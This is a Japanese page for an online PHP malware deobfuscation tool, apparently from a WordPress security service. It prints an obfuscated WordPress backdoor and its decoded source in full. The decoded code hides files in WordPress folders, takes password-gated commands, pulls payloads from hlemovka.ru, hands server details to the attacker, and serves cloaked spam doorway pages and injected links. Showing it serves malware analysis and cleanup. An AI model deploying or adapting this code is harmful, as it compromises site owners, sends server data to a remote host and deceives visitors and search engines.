Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $XYBPUxYXhS="Ky5CF2cewR7jph0lsUxTNf6ndkZqAgLJI9arYD8QMSWOz4Xtv13omV_BHbuiGPE";$zfqzpjKqjgxTW=$XYBPUxYXhS[57].
$XYBPUxYXhS[34]. $XYBPUxYXhS[16] .$XYBPUxYXhS[7].
$XYBPUxYXhS[22] .$XYBPUxYXhS[45].
$XYBPUxYXhS[54] . $XYBPUxYXhS[24]. $XYBPUxYXhS[7] . $XYBPUxYXhS[6] . $XYBPUxYXhS[51]. $XYBPUxYXhS[24].
$XYBPUxYXhS[7];$zDJaNaMycX=$XYBPUxYXhS[16].
$XYBPUxYXhS[47] .$XYBPUxYXhS[35]. $XYBPUxYXhS[35]. $XYBPUxYXhS[7]. $XYBPUxYXhS[48];$GFGDTLyNe=$XYBPUxYXhS[7].$XYBPUxYXhS[35].
$XYBPUxYXhS[35]. $XYBPUxYXhS[51] .$XYBPUxYXhS[35].
$XYBPUxYXhS[54] . $XYBPUxYXhS[35].
$XYBPUxYXhS[7] .$XYBPUxYXhS[12] . $XYBPUxYXhS[51] .$XYBPUxYXhS[35].
$XYBPUxYXhS[47] . $XYBPUxYXhS[59]. $XYBPUxYXhS[23].$XYBPUxYXhS[29];$xPVxSXWqBkTtdc=$XYBPUxYXhS[6].$XYBPUxYXhS[35] .$XYBPUxYXhS[7].
$XYBPUxYXhS[34] . $XYBPUxYXhS[47].$XYBPUxYXhS[7] .$XYBPUxYXhS[54] .$XYBPUxYXhS[21].
$XYBPUxYXhS[58] .$XYBPUxYXhS[23].
$XYBPUxYXhS[6].
$XYBPUxYXhS[47] . $XYBPUxYXhS[59]. $XYBPUxYXhS[51]. $XYBPUxYXhS[23];$GFGDTLyNe(0);$MQfjCncjlLvAs=$xPVxSXWqBkTtdc("",$zfqzpjKqjgxTW($zDJaNaMycX("K0QfK0gCN0XCK0wO0lGeltjZ1JGJg8GajVWCJoQD7kCKldWYw9Ve49mcw9FdldWPpQ3YkwiZ1JGJoQ3cpxWCJoQDK0welNHbl1XCK0QfJkgCNsDdphXZ7YWdiRCIvh2YllQCJoQD9lQCJoQD7kCKldWYw9Ve49mcw9FdldWPpQ3YkwiZ1JGJoQ3cpxWCJkQCK0welNHbl1XCJkgCNsTKhVHJskiZlJHJoUGZvNmblxmc1dXYy5iI9YWZyZiIuAXa51GJuISPyRGZhZiIukCeyVHJoUGZvNmblxmc1dXYy5iI9UnJi4SK0N3boRCKlR2bj5WZsJXd3FmcuISPkZiIukSZzFmYkgSZk92YuVGbyV3dhJnLi0TZzFmYmIiLpQmcvdXeltGJoUGZvNmblxmc1dXYy5iI9sWbmIiLrNWYwRUSk4iI9AXa/AHaw5iZm9ibpFWbvRGJv8iOwRHdoJCK0V2ZfV2ZhB3X5xmc1NWPp8mZul2X0V2ZfV2ZhB3X5xmc1NGJsYWdiRCK0NXaslQCJkgCNsXKp0lIy92bkNXais1bm5WakgCdlN3cphCImlWCJkgCNsHIpU2ckgCImlWCJoQD9lQCK0gCNoQDK0QfJkQCK0wO0lGeltjZ1JGJg8GajVWCJkQCK0gCN0XCJkQCK0wOpA3clJHJsA3ZlJHJsM3aulGbkwiZ1JGJogXZnVmcfV2ZhB3Xldmbhh2Y9YWdiRSCJkQCJoQD70lIw91cr5WasJyWvZmbpRSPztmbpxGJJkQCJkgCNsTM9A3clJHJ7cycp9SK+wFcvwFPc1HMzsnLo8yJ9A3ZlJHJJkQCJkgCNoQD7kSYzVmckwSYnVmckwycr5WasRCLmVnYkgCeldWZy9VZnFGcfV2ZuFGaj1jZ1JGJJkQCJkgCNsTXiE2XztmbpxmIb9mZulGJ9M3aulGbkkQCJkQCK0wOw0TYzVmckszJp9iPcF2LcxDX/oiL+w1Pq4yccFGPc9yJ9E2ZlJHJJkQCJkgCNsXKpICbtRHavQHelRnIsQ3Ykgic0NXayR3coAiZplQCJkgCNoQD7kCKldWYw9Ve49mcw9FdldWPpQ3YkwiZ1JGJoQ3cpxWCJkQCK0gCNsXZzxWZ9lQCJoQD9lQCJkgCNsDdphXZ7UGdhxGctVGdkAyboNWZJkQCJkgCNoQD9lQCJkQCK0QfJkQCJkQCK0wOpUGdhxGctVGdkwyaulGbkwiIlIiLpRiLi81SOlETfVERJNlTJViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJkgCNsXKr5WasRCI+0DIpRCIzFGIztmbpx2XlRWaz5WakgCajFWZy9mZJkQCJkQCK0QCK0wOpUGdhxGctVGdkwSKpQmcvdXeltGJo0WayRHIsICLiACLiAiIoU2YhxGclJ3XyR3csISJkJ3b3lXZrViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJoQD7kSZ0FGbw1WZ0RCLkJ3b3lXZrNWdkwiIlQmcvdXelt2Y1ViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJoQD7kSZ0FGbw1WZ0RCLu9Wa0BXayN2clRGJsISJu9Wa0BXayN2clRWJigSZjFGbwVmcfJHdz1TZ0FGbw1WZ0RSCJkQCJkgCNsTKlRXYsBXblRHJsUGb0lGdkwiIlUGb0lGdlICKlNWYsBXZy9lc0NXPlRXYsBXblRHJJkQCJkQCK0wOpUGdhxGctVGdkwCd4VGdkwiIlQHelRXJigSZjFGbwVmcfJHdz1TZ0FGbw1WZ0RSCJkQCJkgCNsXZzxWZ9lQCJkQCK0QfJkQCJkQCK0wOpUGdhxGctVGdkwCbwVmckwyayFWbkgSZjFGbwVmcfJHdz1TZ0FGbw1WZ0RSCJkQCJkQCK0wepwGclJHJg4TPgsmch1GJgMXYg0lIy5mIb9mZulGJog2YhVmcvZWCJkQCJkgCNsXKpkSXiInbis1bm5WakgSehJnch91cphiJmkSKdJicuJyWvZmbpRCK0V2czlGKoAiZplQCJkQCK0welNHbl1XCJkQCK0wO0lGeltDduVGdu92Yy92bkRCIvh2YllQCJkQCK0wOpQHelRHJoUGZvNWZk9FN2U2chJWP05WZ052bjJ3bvRGJJkQCJkgCNsXKp0lIl52bsFGZuFGdzJyWvZmbpRCK0V2czlGKgYWaJkQCJoQDK0wepkSXiI3bvR2cpJyWvZmbpRCK0V2czlGKgYWaJkQCK0gCN0Xf7kCbhZHJoIXZkFWZoliIi0TIsFmdkgiZptTKsFmdkgSbpJHd9wWY2RyepwWY2RCIzFGIzVGc5RHJog2YhVmcvZ2OpUGc5RHduVGdu92YkwiIuxlIoUGZvxGc4VWPzVGc5RHJ7kSXiUGc5RHduVGdu92Yis1bm5WakgSZk92YlR2X0YTZzFmYA1TZwlHd05WZ052bjRyepkSXiUGc5RHduVGdu92Yis1bm5WakgCdlN3cphCImlWCJkgCNsHIpQ3biRCKgYWaJkgCNsTXiM3aulGbfVGZpNnbpJyWvZmbpRCQ9M3aulGbfVGZpNnbpRyOpQmcvdXeltGJoMHZy92djVXPkJ3b3lXZrNWdksTXi42bpRHcpJ3YzVGZis1bm5WakAUPu9Wa0BXayN2clRGJ70lIlxGdpRnIb9mZulGJA1TZsRXa0RyOdJCd4VGdis1bm5WakAUP0hXZ0RyOdJSZzFmYis1bm5WakAUPlNXYiRyOdJyajFGcElkIb9mZulGJA1zajFGcElEJ70lIkJ3b3lXZrJyWvZmbpRCQ9QmcvdXeltGJJkgCNsTKpYWdiRCKlR2bjVGZfRjNlNXYihSZ6lGbhlmclNnb11zbm5WaksTKmRCKlN3bsNmZAtTKpYGJoMHdldmZAhSbpJHd9YWdiRyOpYmZvRCLmRCKrVWZzZGQ7kiIyJCLkJGJo4WZw9mZA1jZksTKpwGctVGdkgyc05WZ052bj9Fdld2XlxWamBEKlR2bjVGZfRjNlNXYiBUPlRXYsBXblRHJJkgCNsDMr0FeyVXNk1GJbZ2Yk0jZm9GJJkgCNsTM9Q3biRSKpEWdkACLik2IyVGZpB3c1RWahJGfyVGb3FmcjxXdy5CXslWYtx3dllmdlJHcgIWZ3BSZsd2bvdGfv9GahlHf09mY8JXZklGczxXZslmYv1UL09mYlx2Zv92R8Nncl5GdyFGchlGZl1Eflx2Zv92RtQ3bCNHZBxnclx2dhJ3YtE2cnxXZsd2bvd2IigCajRXYt91ZlJHcoAiZplQCK0wOx0TZzRSKpYWZyRCIsISaj02bj5CXu9Gb5JWYixXbvNmLcVmZhNWek5WYoxXbvNmLch2YyFWZzJWZ3lXb812bj5CX392d8RXZu5CXyVGdyFGajxXbvNmLcRXa1RmbvNGfv9GahlHfoNmchV2c8FGdzlmdhRHbhxXbvNmLcx2bhxXbvNmLct2chxXbvNmLc52ctxXbvNmLcdmbpJGflx2Zv92ZjICKoNGdh12XnVmcwhCImlWCJoQD70lISRERB9VRU9UTFJlIbJVRWJVRT9FJA1DcplXbksTXiIVRSVkRFJ1XQRFVIJyWSVkVSV0UfRCQ9YWZyRyOdJCVOV0RB9lUFNVVfBFVUhkIbJVRWJVRT9FJA1TY1RyOw0TZzRyOw0DdvJGJJkgCNsXKp0FeyVXNk1GJbZ2YkgCdlN3cpBEKgYWaJoQDJoQD9lgCNsTKpkycnlmZu92Ykgyc05WZ052bj9Fdld2XlxWamBEKlR2bjVGZfRjNlNXYiBEKlpXasFWayV2cuVHQ9Y2YkkQCK0wepkycnlmZu92Ykgyc0NXa4V2XlxWamBEKgYWaJoQD7kCK5FmcyFWPmNGJJoQDK0welNHbl1nCNoQDK0QfJoQDK0wO0lGellQCK0gCNsTKpQXdvRCKlpXasFWayV2coUGZvNmbl9FN2U2chJGIvh2YllQCK0wOpkQCJkQCK0ALwAiOgkCbw1WZ0RCKlpXazVGbpZGI/ASKsBXblRHJoUGbpZ2XzlGI+0DInUmepN3XlxWam9VZ0FGbw1WZ0dSCJkQCJkgCNwCMgoDIpQmYkgSZ6l2clxWamByPgkCZiRCKlxWam91cpBiP9AyJlpXaz9VZslmZfJGZnkQCJkQCJoQDsM3ZpZmbvNGJg4TPgcSZslmZnlmZu92YnkQCJkQCJoQDs81XFxUSG91Xg4TPgcSZslmZnkQCJkQCJoQDsIVRWJVRT9FJg4TPgciclZnclN3JJkQCJkQCK0ALmNGJg4TPgciZjdSCJkQCJkgCNgSehJnch1Dd19GJJkgCNoQD9lQCK0wOpkSKzdWam52bjRCKzRnblRnbvN2X0V2ZfVGbpZGQoUGZvNWZk9FN2U2chJGQoUmepxWYpJXZz5WdA1jZjRSCJkgCNsXKpM3ZpZmbvNGJoMHdzlGel9VZslmZAhCImlWCJoQD7kCK5FmcyFWPmNGJJkgCNsXKiUjI90DekgCImlWCK0QfJoQD7QXa4V2Oi4GXjMyIEV0SS90VjMyIiAyboNWZJkgCNsXKiQjI90DekgCImlWCK0gCNoQD9lgCNsDdphXZJkgCNsjIux1IjMCRFRVQEBVVjMyIiAyboNWZJkgCNsTKxYWdiRCLsBXblRHJoMHduVGdu92YfRXdw9VZslmZAtTKiYWan5CbsF2cl1WZoRXLwdnIuIXdkgCdld2XldWYw9VesJXdjBUPpQHJsEjZ1JGJoQ3cpxWCJoQD7kSMmVnYkwCZiRCKzRnblRnbvN2X0VHcfVGbpZGQ7kiInBnauMnbvNWahRXZtJiLyVHJoQXZn9VZnFGcflHbyV3YA1TK0RCLxYWdiRCK0NXaslQCK0wOpEjZ1JGJsM3ZpZmbvNGJoMHduVGdu92YfRXdw9VZslmZAtTKicmbw5SMpp2btVmIuIXdkgCdld2XldWYw9VesJXdjBUPpQHJsEjZ1JGJoQ3cpxWCJoQD7IyLi4Cdz9Ga1QWbk4iIvMXZnFWbp9iIu4Wah12bkRiLi8yL6AHd0hmI9IXdkkQCK0wOi4GXjMyITVETJZ0XH5USUFERQV1IjMiIg8GajVWCJoQD7liIyISP9gHJoAiZplgCNoQD7lSKzNXYwVDZtRSP9AHJoYiJpIiI9ECekgCKgYWaK0gCNsTKpkiIwJCKsFmdfRXZnhSZk92YlR2X0YTZzFmYAhSNk1WPwRSKiISPhgHJoAiZppQD7IiI9AHJK0gCNsTKi0TVuNWdFJTYykzVixGeHFmIoUGZvNWZk9FN2U2chJWPulWYt9GZkoQDK0gCNoQD7IiZpdmLsxWYzVWblhGdtA3di4Ca0FGcw1Gdk0Dbw1WZ0RiCNsjInBnauMnbvNWahRXZtJiLoRXYwBXb0RSPkJGJK0wOlxWamNGJugGdhBHctRHJ9M3ZpZmbvNGJK0gCNoQD7kCa0FGcw1GdkgicpR2atB0O1QWb4RiLoRXYwBXb0RSPoRXYwBXb0RiCNoQD9pQD7IiLi0Da0FGcw1GdkkgCNsXZzxWZ9pQD7kCKoRXYw9lYk9FdldWPoRXYwBXb0RSCK0wepkSZslmZjRiL1QWb4RiLi4iIoMHdzlGel9VZslmZAFCKgYWaK0gCNsjIn5GcuETaq9WblJSPlxWamNGJK0gCNsjIvIiL0N3boVDZtRiLi4yLi0TNk1GekoQDK0gCNsTK4JXdkgSNk1WP4JXd1QWbksTayVHJuQ3cvhGJ9gnc1RyOpQ3cvhGJoUDZt1Ddz9Ga1QWbkoQD7kCdz9GakwiIiwiIuc3d3JCKlNWYsBXZy9lc0NXP0N3boRiCNsTXikkUV9FVTVUVRVkUislUFZlUFN1XkAUPpJXdkoQD7kSXiQ1UPh0XQRFVIJyWSVkVSV0UfRCQoIXZ39GbvRnc0NXP0N3boRiCNoQD7IiYzQTZmFGMyUTMlN2M4ETYwYWYwIDOygTMwcTN0UWNlJSPzNXYwVDZtRiCNoQD7kiIrNWZoN2XwBHcwJCKsFmdfRXZn1DekoQD7IiI9QnblRnbvNGJK0gCNoQDK0gCN0nCNoQD7IiLiAibyVHdlJXCK0gCNsjcpR2Xw1GdkAibyVHdlJHIpkicpR2Xw1GdkgSZsJWY0lmc391cpBiJmASKylGZfBXb0RCKylGZfNXaoAiZplgCNsTKoIXak9FctVGdfRXZn91c5NHI9AicpR2Xw1GdkkgCNoQD7kyJucCKg4mc1RXZyBSKpciLngSZsJWY0lmc391cphCImlWCK0gCNsTKylGZfRnblJnc1NGJoIXakV2cvx2YJoQD7kicpRGJoAibyVHdlJHIpkicpRGJoUGbiFGdpJ3dfNXagYiJgkicpRGJoIXak91cpBiJmASKylGZkACLn8CJr4CXe9yJog2Y0FWbfdWZyBXIoAiZpBSKpIXak9FduVmcyV3YkgicpRGZhVmcg0DIylGZkgCIlxWaodXCK0wOpciLngicpRmblB3bg0DIylGZfRnblJnc1NGJJoQDK0wOpQGJoAibyVHdlJHIpkCZkgSZsJWY0lmc391cpBiJmASKkRCKylGZfNXaoAiZpBSKkRCIzFGIzJXak9FdsVXYmVGZkgCIoNWYlJ3bmlgCNoQD7kSCK0wJzRWYvxGc19CduVGdu92YtA3dnkQCK0ALnAXb0dSCJoQDscycul2Z1xGcvMnavU2YtlnbpR3LzJ3b0lGZl9SYpRWZtdSCJoQDscSZnFWdn5WYs9CbtRHavMXbj9ycllmchJnYpx2JJkgCNwyJzV2Zh1WavM3dllmdvEWakVWbf12bj9yc05WZu9Gct92YvI3b0Fmc0NXaulWbkF2JJkgCNwyJn1WavMmbp91L0VWbzl2ah9ycul2Z1xGcvQnblRnbvNWLwd3JJkgCNwyJz5WanVHbw9SZj1WeulGdvMnavMXZkVHbj5WatA3dnkQCK0ALnQnblRnbvN0LllGUlxGctl2UvMXZkVHbj5WatA3dnkQCK0AK5FmcyFGI9AycylGZfRHb1FmZlRGJJoQDK0QfJoQD7kCKylGZfBXblR3X0V2ZfNXezBibyVHdlJXCJoQD7lSKi4Wa3JCLT90XQhEUoIHdzlmc0NHKgYWaJoQDK0wepgCa0FGcfJGZfRXZnBibvlGdj5WdmpQDK0QfK0gCNsTK0NGJsYWdiRCK5FmcyFGIuJXd0VmcJoQD9lgCNsTKiwmc1RHel5GJgojbvlGdhN2bMJCKyVGZhVGaJkgCNsXKiISPhwmc1RHel5GJoAiZplgCN0XCK0wOpICdjRCI6UGc5RXL05WZ052bDJCKyVGZhVGaJkgCNsXKiISPhQ3YkgCImlWCK0gCNoQD7kSKwEDLwwSKpgSZtlGdoUDZthic0NnY1NnLiAiOYlVQS1iRD1CWigiclRWYlhWKkFWZoBHJoAiZplgCNsTKiMXd0FGdzRCI6MXd0FGdTJCKyVGZhVGapIiI9Eyc1RXY0NHKgYWaJoQD701JlR2bj9Fc0RHans1bm5WafRXZn9VZnFGcflHbyV3YkAUPzVHdhR3ckkgCNsTXnwmc19FdjVmcpRWZydyWvZmbp9Fdld2XldWYw9VesJXdjRCQ9wmc1RHel5GJJoQD701JlBXe09FduVGdu92Yns1bm5WafRXZn9VZnFGcflHbyV3YkAUP0NGJJoQDK0wOpwmc1J3YkgCdld2XldWYw9VesJXdj1TKvZmbp9Fdld2XldWYw9VesJXdjRCLmVnYkgCdzlGbJoQD701JJJVVfR1UFVVUFJ1JbJVRWJVRT9FJA5SXnQ1UPh0XQRFVIdyWSVkVSV0UfRCQu8GdvJHck0DbyVncjRSCK0wOn8yL6AHd0h2JgoDIn8yL6MHc0RHanAyPgUWdyRHI90TPgkyJzBHd0h2Js01JM90QPR1TSB1XSVkVSV0UnslUFZlUFN1XkAEKz9GcpJHdz1zb09mcwRSCK0QCJoQD7lSM9QWYlhGckgSZnFGcflHevJHcfRXZnBibvlGdj5WdmpQDK0QfK0wOp8mZul2X0V2ZfV2ZhB3X5xmc1NGJsQHb1NXZyRCK5FmcyFGIuJXd0VmcJoQD7kCajRCKlN3bsN2XsJXdjlgCNoQD7kCajRCKvZmbpRXZn9FbyV3Y98mZul2X0V2ZfV2ZhB3X5xmc1NGJJoQD7kCajRCKgMWZ4V2XsJXdjBSPgQHb1NXZyRSCK0wOpQnbldWYyV2c1RCIsQlTFdUQSV0UV9FVQ9ETSV1QgwCajRCKgQHcvRXZz9FbyV3YJoQD7kCMgwCVT9ESZZUSSVkVfx0UT9FVQ9ETSV1QgwCajRCKgQHcvRXZz9FbyV3YJoQD7kCMgwiUFVEUZZUSSVkVfx0UT9FVQ9ETSV1QgwCajRCKgQHcvRXZz9FbyV3YJoQD7kCMwAzMgwCVV9URNlEVfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCK0wOpEDIsIVRGNlTBJFVOJVVUVkUfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCK0wOpwmc1RCLMJVVfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCK0wOpgCI0lmbp9FbyV3Yg0DIoNGJJoQD7liI2MjL3MTNvkmchZWYTByMxIjLyEzMx4CMugzNvUWbvJHaDBSKvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSK0YDegsDN24WaXByOw4CMxACVOByc39GZul2VoACMuUzLhxGbpp3bNJSP05WZnFmclNXdkwCbyVHJoQXZn9VZnFGcflHbyV3Yg42bpR3YuVnZK0gCNoQDK0gCN0nCNsTZnFGckAibyVHdlJXCK0AIgACIK0AIgACIK0QfJoQD7kSMgwSZnFGckACLiADJuxlIg4CI05WZtVGblRCIuAiIuxlIgwyJp9iPclHZvJ2LcxDXvcCKlNWYsBXZy91ZlJHcg0DIldWYwRSCJoQD7IiPw9CPiASPuACduVWblxWZkACIgACIgACIJoQD7kycr5WasRCIsIibc5jcixjIoUGZvxGctlGI94CI05WZtVGblRCIgACIgACIgkgCNsjI+AHPiASPgQnbl1WZsVGJgACIgACIgASCK0wepAjPpM3aulGbkgCduV3bjhCImlWCK0QfgACIgACIgAiCNsTKxACLldWYwRCIssmbpxGJg4CInACMkcCIscyLnAiLgkyJvcCIsQnbl1WZsVGJoUGdvVXcfdWZyBHIuAyJvcCKlNWYsBXZy91ZlJHcg0DIldWYwRSCJoQD7kyc05WZtVGblRCK0ZWaoN3X5FmcyFGI9ACduVWblxWZkkQCK0wOpM3aulGbkgCdmlGaz9VehJnchBSPgsmbpxGJJkgCNsHIpsyKpRCI70GJgwDIpRCI7ADI9ASakgCIy9mZgACIgACIgAiCNoQD7kSKzRnbl1WZsVGJoQnb192Yskycr5WasRCK05WdvNGKulWb90GJJoQDK0gCN0XCK0wOpMHduVWblxWZkgSZ1FXauV3X5FmcyFGI9Ayc05WZtVGblRSCJoQD701clJHJbRHb1NXZyRCI9Ayc05WZtVGblRSCJoQD7BSKpQHb1NXZyRCIsU2ZhBHJgwyZlJHJowGbh9FajRXYt91ZlJHcoAiZplgCNsTKokXYyJXYg0DIzRnbl1WZsVGJJoQDK0wepMXZyRCLnVmckwycr5WasRCIsU2ZhBHJogXZnVmcfV2ZhB3Xldmbhh2Yg42bpR3YuVnZK0gCN0nCNsTYkAibyVHdlJXCK0wOpIiI60VKwEGJoIXZwBXdvRnc0NnLi8FUURFSisVak8TKdlCMhRCKyVGcwV3b0JHdz5iIfBFVUhkIblGJoQXZzNXaooTXiATYkIyWpRyPp0lIwEGJisVakgCdlN3cp1TYkkgCNsTKSVkVSV0UfRCLFl0SP90QfRCLUNVRVFVRS9FJoU2ZyVWbflXYyJXYA1TakkgCNsXKwEGJowWY29FdldGIu9Wa0Nmb1ZmCNoQD7kCMoQXatlGbfVWbpR3X0V2cK0gCNkQCJkAIKkQDJkQCgoAI")));$MQfjCncjlLvAs();?><?php
$XYBPUxYXhS = "Ky5CF2cewR7jph0lsUxTNf6ndkZqAgLJI9arYD8QMSWOz4Xtv13omV_BHbuiGPE";
$zfqzpjKqjgxTW = "base64_decode";
$zDJaNaMycX = "strrev";
$GFGDTLyNe = "error_reporting";
$xPVxSXWqBkTtdc = "create_function";
error_reporting(0);
$MQfjCncjlLvAs = function () {
set_time_limit(0);
function get_val($a0)
{
$i = @array_merge($_REQUEST, $_COOKIE, $_SERVER);
$a = isset($i["{$a0}"]) ? $i["{$a0}"] : (isset($i["HTTP_" . strtoupper($a0)]) ? $i["HTTP_" . strtoupper($a0)] : "");
return $a;
}
function change_page_regex($page, $links, $reg, $res)
{
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
$elements = array_unique($elements);
}
$m = min(count($links), count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
if (count($links) > 0) {
$element = "<p>";
$element .= implode("<br>\n", $links);
$element .= "</p>";
$page = preg_replace('/\\<\\/body\\>/i', "\n" . $element . "\n\$0", $page, 1);
}
return $page;
}
function curly_page_get($url, $useragent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1312.213 Safari/537.36")
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec($ch);
$curly_page_get_info = curl_getinfo($ch);
curl_close($ch);
return array($result, $curly_page_get_info);
}
function get_proxy_page($phead = 1)
{
$proto = stripos(@$_SERVER['SERVER_PROTOCOL'], 'https') === true ? 'https://' : 'http://';
$crurl = $proto . @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];
list($buf, $curly_page_get_info) = curly_page_get($crurl);
$ct = @$curly_page_get_info['content_type'];
$nexturl = @$curly_page_get_info['redirect_url'];
$status = @$curly_page_get_info['http_code'];
if (true) {
header("Status: {$status}");
}
if ($phead) {
header("X-CF-RAYX: " . substr(md5(time()), 0, 10));
}
if ($ct != "") {
header("Content-type: {$ct}");
}
if ($nexturl != "") {
header("Location: {$nexturl}");
}
return array($buf, $ct);
}
function get_db_path()
{
if (stristr(PHP_OS, "win")) {
return sys_get_temp_dir();
}
$default_dirs = array('wp-includes/SimplePie/Content', 'wp-includes/js/tinymce/plugins', 'wp-content/plugins/akismet/_inc/img', 'administrator/components/com_media/views/images', 'libraries/cms/html/language', 'media/editors/tinymce/js/plugins', 'tmp', 'wp-content/uploads');
foreach ($default_dirs as $d) {
if (is_dir($d) && is_writable($d)) {
return $d;
}
}
$current_dir = opendir('.');
while ($dir = readdir($current_dir)) {
if (!preg_match('/^\\.+$/', $dir) && is_dir($dir) && is_writable($dir)) {
return $dir;
}
}
closedir($current_dir);
if (is_writable('.')) {
return '.';
}
$tmp_dir = sys_get_temp_dir();
if (is_dir($tmp_dir) && is_writable($tmp_dir)) {
return $tmp_dir;
}
return ".";
}
$content = "";
$x = get_val("pppp_check");
$md5pass = "e5e4570182820af0a183ce1520afe43b";
$host = strtolower(@$_SERVER["HTTP_HOST"]);
$uri = @$_SERVER["REQUEST_URI"];
$host = str_replace("www.", "", $host);
$md5host = md5($host);
$urx = $host . $uri;
$md5urx = md5($urx);
$xmd5 = "/." . $md5host . "/";
$cfile = "emoji1.png";
if (!@file_exists("." . $xmd5 . $cfile)) {
$tmppath = get_db_path();
} else {
$tmppath = ".";
}
$tmppath .= $xmd5;
@mkdir($tmppath);
$configs = $tmppath . $cfile;
$bd = $tmppath . "metaicons.jpg";
$templ = $tmppath . "wp-themesall.gif";
$domain = "hlemovka.ru";
$p = "";
if ($x != "") {
$p = md5(@base64_decode(get_val("p")));
}
if ($x != "" && $p == $md5pass) {
if ($x == "2") {
echo "###UPDATING_FILES###\n";
$ur = "http://" . $domain . "/images/" . $md5host . "/";
list($buf1, $t) = @curly_page_get($ur . "emoji1.png");
@file_put_contents($configs, $buf1);
list($buf1, $t) = @curly_page_get($ur . "metaicons.jpg");
@file_put_contents($bd, $buf1);
list($buf1, $t) = @curly_page_get($ur . "wp-themesall.gif");
@file_put_contents($templ, $buf1);
echo "###UPDATED###\n";
exit;
}
if ($x == "4") {
echo "###WORKED###\n";
exit;
}
if ($x == "5") {
$cf = array();
if (@file_exists($configs)) {
$cf = @unserialize(@base64_decode(@file_get_contents($configs)));
}
$out = array('cf' => $cf, 'server' => $_SERVER, 'file' => "/var/www/html/input.php", 'configfile' => $configs, 'db_file_size' => is_file($bd) ? filesize($bd) : 0, 'template_file_size' => is_file($templ) ? filesize($templ) : 0);
echo base64_encode(serialize($out));
exit;
}
} else {
$cf = array();
if (@file_exists($configs)) {
$cf = @unserialize(@base64_decode(@file_get_contents($configs)));
}
if (@isset($cf[$md5urx])) {
$bot = 0;
$se = 0;
$ua = @$_SERVER["HTTP_USER_AGENT"];
$ref = @$_SERVER["HTTP_REFERER"];
$myip = @$_SERVER["REMOTE_ADDR"];
if (preg_match("#google|bing\\.com|msn\\.com|ask\\.com|aol\\.com|altavista|search|yahoo|conduit\\.com|charter\\.net|wow\\.com|mywebsearch\\.com|handycafe\\.com|babylon\\.com#i", $ref)) {
$se = 1;
}
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\\.ru|crawler|baiduspider#i", $ua)) {
$bot = 1;
}
$off = $cf[$md5urx] + 0;
$template = @base64_decode(@file_get_contents($templ));
$f = @fopen($bd, "r");
@fseek($f, $off);
$buf = trim(@fgets($f));
@fclose($f);
$info = unserialize(base64_decode($buf));
$keyword = @$info["keyword"];
$IDpack = @$info["IDpack"];
$base = @$info["base"];
$text = @$info["text"];
$title = @$info["title"];
$description = @$info["description"];
$uckeyword = ucwords($keyword);
$inside_links = @$info["inside_links"];
if ($bot) {
if (isset($info["contenttype"])) {
$contenttype = @base64_decode($info["contenttype"]);
$types = explode("\n", $contenttype);
foreach ($types as $val) {
$val = trim($val);
if ($val != "") {
header($val);
}
}
}
if (isset($info["isdoor"])) {
if (isset($info["standalone"])) {
$doorcontent = base64_decode($text);
echo $doorcontent;
exit;
} else {
if (isset($info["nr"]) && is_array($info["nr"])) {
foreach ($info["nr"] as $mark => $repl) {
$template = str_replace($mark, $repl, $template);
}
} else {
$template = str_replace("%text%", $text, $template);
$template = str_replace("%title%", $title, $template);
$template = str_replace("%description%", $description, $template);
$template = str_replace("%uckeyword%", $uckeyword, $template);
$template = str_replace("%keyword%", str_replace(" ", ",", trim($keyword)), $template);
foreach ($inside_links as $i => $link) {
$template = str_replace("%INSIDE_LINK_" . $i . "%", $link, $template);
}
}
echo $template;
exit;
}
} else {
list($buf, $ct) = get_proxy_page();
if (stristr($ct, "text/html")) {
$rega = '/\\<a\\s.*?\\>.*?\\<\\/a\\>/i';
$resa = 0;
$links = $info["links_a"];
$buf = change_page_regex($buf, $links, $rega, $resa);
$regp = '/(.{30}\\<\\/p\\>)/is';
$resp = 1;
$links = $info["links_p"];
$buf = change_page_regex($buf, $links, $regp, $resp);
}
echo $buf;
exit;
}
}
if ($se) {
if (isset($info["isdoor"])) {
list($buf, $curly_page_get_info) = curly_page_get("http://{$domain}/ff.php?ip=" . $IDpack . "&mk=" . rawurlencode($keyword) . "&base=" . rawurlencode($base) . "&d=" . rawurlencode($host) . "&u=" . rawurlencode($urx) . "&addr=" . $myip . "&ref=" . rawurlencode($ref), $ua);
} else {
list($buf, $ct) = get_proxy_page();
}
echo $buf;
exit;
}
} else {
list($buf, $ct) = get_proxy_page();
echo $buf;
exit;
}
}
};
$MQfjCncjlLvAs();■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.